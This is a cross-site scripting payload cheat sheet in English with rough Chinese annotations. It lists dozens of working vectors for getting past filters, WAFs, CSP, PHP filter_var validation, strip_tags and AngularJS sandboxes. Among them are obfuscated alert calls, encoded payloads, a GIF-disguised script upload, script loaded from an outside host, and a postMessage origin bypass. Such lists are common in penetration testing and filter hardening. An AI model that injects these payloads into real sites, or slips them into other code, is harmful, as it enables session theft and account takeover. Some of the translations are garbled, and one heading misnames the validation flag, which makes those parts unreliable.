Bypass
- Mixed Case(混合大小写)
<Svg OnLoad=alert(1)>
<Script>alert(1)</Script>
- Unclosed Tags 利用未闭合的标签绕过
Use in HTML injections to avoid filtering based in the presence of both lower than (<) and
greater than (>) signs. It requires a native greater than sign in source code after input
reflection.
<svg onload=alert(1)//
<svg onload="alert(1)"
- Uppercase XSS
当应用程序以大写形式反映输入时使用。将“&”替换为“%26”,将“#”替换为
“% 23”url。
<SVG ONLOAD=alert(1)>
alert= alert
<SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
-
Extra Content for Script Tags
Use when filter looks for “
<script>” or “<script src=...” with some variations but without
checking for other non-required attribute.
<script/x>alert(1)</script>
- Double Encoded XSS
当应用程序执行输入的双译码时使用。
%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
<svg onload=alert(1)>
"><svg onload=alert(1)>
的两次编码
- Alert without Parentheses (Strings Only)
当不允许使用括号且一个简单的警告框就足够时,在HTML向量或javascript注入中使用。
Use in an HTML vector or javascript injection when parentheses are not allowed and a
simple alert box is enough.
alert`1`
- Alert without Parentheses
当不允许使用括号且PoC需要返回任何目标信息时,在HTML向量或javascript注入中使用。
setTimeout`alert\x28document.domain\x29`
setInterval`alert\x28document.domain\x29`
\x28 \x29 ASCII ( )
- Alert without Parentheses – HTML Entities HTML实体
仅在不允许使用括号的HTML注入中使用。将url中的“&”替换为“%26”,“#”替换为“%23”。
<svg onload=alert(1)>
<svg onload=alert(1)>
()换成HTML实体绕过
- Alert without Alphabetic Chars (字母字符)
当不允许使用字母字符时使用
Following is alert(1).
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
- Alert Obfuscation混淆
对正则表达式进行混淆
用于欺骗多个正则表达式(正则表达式)过滤器。它可能与以前的替代方案(如上)相结合。最短的选项“top”也可以替换为“window”、“parent”、
“self”或“this”取决于上下文Use to trick several regular expression (regex) filters. It might be combined with previous
alternatives (above). The shortest option “top” can also be replaced by “window”, “parent”,
“self” or “this” depending on context.
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
- Alert Alternative – Write & Writeln(别的函数绕过)
Use as an alternative to alert, prompt and confirm.
如果在HTML向量中使用,则可以按原样使用
但如果是JS注入 the full “document.write” form is required
将url中的“&”替换为“%26”,“#”替换为“%23”。Write可以被writeln代替
write`XSSed!`
write`<img/src/oNerror=alert(1)>`
write('\74img/src/o\156error\75alert\501\51\76')
- Alert Alternative – Open Pseudo-Protocol
Use as an alternative to alert, prompt and confirm.
上面的技巧在这里也适用。 只有第二个可以在基于chrome的浏览器中工作,并且需要<iframe name=0>。
top.open`javas\cript:al\ert\x281\x29`
top.open`javas\cript:al\ert\x281\x29${0}0`
- Alert Alternative - Eval + URL
Use as an alternative to call alert, prompt and confirm
第一个payload是原始形式,第二个使用vector的id属性值替换eval。URL必须以下列方式之一,在PHP扩展后的URL路径或在URL片段。加号(+)必须在url中编码。
<svg onload=eval(" ' "+URL)>
<svg id=eval onload=top[id](" ' "+URL)>
PoC URL must contain one of the following:
=> FILE.php/'/alert(1)//?...
=> #'/alert(1)
- Alert Alternative - Eval + URL with Template Literal
${alert(1)}<svg onload=eval('`//'+URL)>
- HTML Injection - Inline Alternative
Use to bypass blacklists.
"onpointerover=alert(1) //
"autofocus onfocusin=alert(1) //
- Strip-Tags Based Bypass
当过滤器删除<和>字符之间的任何内容时使用,比如PHP的strip_tags()函数。内联注入。
"o<x>nmouseover=alert<x>(1)//
"autof<x>ocus o<x>nfocus=alert<x>(1)//
- File Upload Injection – HTML/js GIF Disguise 伪装
用于通过文件上传绕过CSP(内容安全策略) Save all content below as “xss.gif” or “xss.js” (for strict
MIME checking) 它可以导入到目标页面 <link rel=import href=xss.gif> (also
“xss.js”) or <script src=xss.js></script>. It’s image/gif for PHP.
GIF89a=//<script>
alert(1)//</script>;
- Jump to URL Fragment(片段)
Use when you need to hide some characters from your payload that would trigger(触发) a WAF
for example. It makes use of respective(分别的) payload format after URL fragment (#).
eval(URL.slice(-8)) #alert(1)
eval(location.hash.slice(1)) #alert(1)
document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>
- Second Order XSS Injection
当您的输入将被使用两次时使用,比如在数据库中进行规范化存储,然后检索以供以后使用或插入到DOM中。
<svg/onload=alert(1)>
- PHP Spell Checker Bypass
用于绕过PHP的pspell_new函数,该函数提供一个字典来尝试猜测用于搜索的输入。一个“Did You Mean”类似谷歌的搜索功能。
<scrpt> confirm(1) </scrpt>
- Event Origin Bypass for postMessage() XSS
- postMessage() XSS的事件起源绕过
Use when a check for origin can be bypassed in javascript code of target by prepending one
of the allowed origins as a subdomain of the attacking domain that will send the payload.
Example makes use of CrossPwn script (available in Extra section) at localhost.
http://facebook.com.localhost/crosspwn.html?target=//brutelogic.com.br/tests/
status.html&msg=<script>alert(1)</script>
- CSP Bypass (for Whitelisted Google Domains)
当存在允许从这些域执行的CSP(内容安全策略)时使用。
<script src=//www.google.com/complete/search?client=chrome%26jsonp=alert(1)>
</script>
<script src=//www.googleapis.com/customsearch/v1?callback=alert(1)></script>
<script src=//ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
</script><x ng-app ng-csp>{{$new.constructor('alert(1)')()}}
- SVG Vectors with Event Handlers
It works on Firefox but adding attributename=x inside
based too
“Set”也可以被“animate”替换。 Use against blacklists.
<svg><set onbegin=alert(1)>
<svg><set end=1 onend=alert(1)>
- SVG Vectors without Event Handlers
Use to avoid filters looking for event handlers or src, data, etc. Last one is Firefox only,
already URL encoded.
<svg><a><rect width=99% height=99% /><animate attributeName=href
to=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href
values=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href to=0
from=javascript:alert(1)>
<svg><use xlink:href=data:image/svg
%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAv
c3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI
%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9Imp
hdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
- Vectors without Event Handlers
Use as an alternative to event handlers, if they are not allowed. Some require user
interaction(交互) as stated in the vector itself (also part of them).
<script>alert(1)</script>
<script src=data:,alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
- Vectors with Agnostic Event Handlers
Use the following vectors when all known HTML tag names are not allowed.
任何字母字符或字符串都可以用来代替“x”作为标记名。
它们需要用户交互,正如它们的文本内容所述(这也是向量的一部分)。
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x onauxclick=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmouseenter=alert(1)>hover this
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<x onpointercancel=alert(1)>hover this!
<x onpointerdown=alert(1)>hover this!
<x onpointerenter=alert(1)>hover this!
<x onpointerleave=alert(1)>hover this!
<x onpointermove=alert(1)>hover this!
<x onpointerout=alert(1)>hover this!
<x onpointerover=alert(1)>hover this!
<x onpointerup=alert(1)>hover this!
<x onpointerrawupdate=alert(1)>hover this!
- Mixed Context Reflection Entity Bypass
Use to turn a filtered reflection in script block in actual valid js code. It requires to be
reflected both in HTML and javascript contexts, in that order, and close to each other. The
svg tag will make the next script block be parsed in a way that even if single quotes become
encoded as ' or ' in reflection (sanitized), it will be valid for breaking out of
current value and trigger the alert. Vectors for the following javascript scenarios,
respectively: single quote sanitized, single quote fully escaped, double quote sanitized and
double quote fully escaped.
">'-alert(1)-'<svg>
">'-alert(1)-'<svg>
">alert(1)-"<svg>
"">alert(1)-"<svg>
- Strip-My-Script Vector
Use to trick filters that strips the classic and most known XSS vector.
It works as it is and if
<script> gets stripped.
<svg/on<script><script>load=alert(1)//</script>
-
Javascript Alternative Comments
Use when regular javascript comments (//) are not allowed, escaped or removed.
<!--
%0A-->
- JS Lowercased Input
Use when target application turns your input into lowercase via javascript. It might work
also for server-side lowercase operations.
<SCRIPT>alert(1)</SCRIPT>
<SCRIPT/SRC=data:,alert(1)>
- Overlong UTF-8
Use when target application performs best-fit mapping.
%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
-
Vectors Exclusive for ASP Pages
Use to bypass <[alpha] filtering in .asp pages.
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
- PHP Email Validation Bypass PHP邮件验证绕过
用于绕过PHP的filter_var()函数的FILTER_VALIDATE_EMAIL标志。
"><svg/onload=alert(1)>"@x.y
- PHP URL Validation Bypass PHP URL验证绕过
用于绕过PHP的filter_var()函数的FILTER_VALIDATE_EMAIL标志。
javascript://%250Aalert(1)
- PHP URL Validation Bypass – Query Required PHP URL验证旁路-需要查询
使用PHP的filter_var()函数的FILTER_FLAG_QUERY_REQUIRED来绕过FILTER_VALIDATE_EMAIL。
Use to bypass FILTER_VALIDATE_EMAIL with FILTER_FLAG_QUERY_REQUIRED of PHP’s
filter_var() function.
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
(with domain filter)
javascript://https://DOMAIN/%250A1?alert(1):0
- DOM Insertion via Server Side Reflection
Use when input is reflected into source and it can't execute by reflecting but by being
inserted into DOM. Avoids browser filtering and WAFs.
\74svg o\156load\75alert\501\51\76
- XML-Based Vector for Bypass
Use to bypass browser filtering and WAFs in XML pages.
Prepend a “-->” to payload if input
lands in a comment section or “]]>” if input lands in a CDATA section.
<_:script xmlns:_="http://www.w3.org/1999/xhtml">alert(1)</_:script>
- Javascript Context - Code Injection (IE11/Edge Bypass)
用于在注入javascript上下文时绕过Microsoft IE11或Edge。
';onerror=alert;throw 1//
-
HTML Context - Tag Injection (IE11/Edge XSS Bypass)
Use to bypass their native filter in multi reflection scenarios. 多反射场景
"'>confirm(1)</Script><Svg><Script/1='
- Javascript Pseudo-Protocol Obfuscation
Use to bypass filters looking for javascript:alert(1).
Be sure it can work (pass) with “1” before
adding alert(1) because this very payload might need some extra obfuscation to bypass
filter completely. Last option only works with DOM manipulation of payload (like in
Location Based Payloads or DOM-based XSS). Encode them properly in URLs.
javascript:1
javascript:1
javascript	:1
javascript:1
"javas%0Dcript:1"
%00javascript:1
- AngularJS Injection (v1.6+) – No Parentheses, Brackets or Quotes
Use to avoid filtering. First payload avoids parentheses, second one avoids brackets and the
last vector avoids quotes by using it in the same or in a separated injection point. Encode
properly in URLs
{{$new.constructor('alert\u00281\u0029')()}}
{{$new.constructor('alert(1)')()}}
<x ng-init=a='alert(1)'>{{$new.constructor(a)()}}
- Inside Comments Bypass
如果允许HTML注释中的任何内容,则使用Vector (regex: /<!----.*---->/)。
<!--><svg onload=alert(1)-->
- Agnostic Event Handlers Vectors – Native Script Based
Vectors with event handlers that can be used with arbitrary tag names useful to bypass
blacklists. They require some script loaded in page after the point of injection in source
code. Keep in mind that using existing tag names like “<b” for below handlers might be the
only way to trigger in some scenarios.
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
- Agnostic Event Handlers Vectors – CSS3 Based
Vectors with event handlers that can be used with arbitrary tag names useful to bypass
blacklists. They require CSS in the form of<style>or importing stylesheet with <link>. Last
four ones work only in Firefox.
<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x ontransitionend=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionrun=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionstart=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitioncancel=alert(1)><style>*{transition:color 1s}*:hover{color:red}